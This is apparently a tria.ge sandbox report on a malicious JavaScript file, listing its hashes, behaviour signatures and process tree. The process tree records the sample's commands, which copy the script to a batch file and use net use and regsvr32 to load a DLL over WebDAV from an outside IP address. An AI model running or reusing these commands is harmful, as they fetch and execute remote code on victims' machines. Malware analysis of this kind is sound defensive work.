Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
11/07/2024, 09:26
Static task
static1
Behavioral task
behavioral1
Sample
155945859957932489.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
155945859957932489.js
Resource
win10v2004-20240709-en
General
-
Target
155945859957932489.js
-
Size
5KB
-
MD5
02db4fd1a39cf089e9ed8e1c21a6d26e
-
SHA1
49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
-
SHA256
522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
-
SHA512
9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad
-
SSDEEP
96:E5SNRNRZ/viEAwNNq700XA4Nq7008xJBdUjObreVKLVE1T0rQjMDu80+7VGnDuse:QeR1qEpNN600XLN600QGAg76VHdFka
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1632 wrote to memory of 4716 1632 wscript.exe 84 PID 1632 wrote to memory of 4716 1632 wscript.exe 84 PID 4716 wrote to memory of 2592 4716 cmd.exe 86 PID 4716 wrote to memory of 2592 4716 cmd.exe 86 PID 4716 wrote to memory of 3900 4716 cmd.exe 87 PID 4716 wrote to memory of 3900 4716 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\155945859957932489.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\155945859957932489.js" "C:\Users\Admin\\xnsbwi.bat" && "C:\Users\Admin\\xnsbwi.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2592
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\554.dll3⤵PID:3900
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD502db4fd1a39cf089e9ed8e1c21a6d26e
SHA149812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
SHA256522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
SHA5129d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad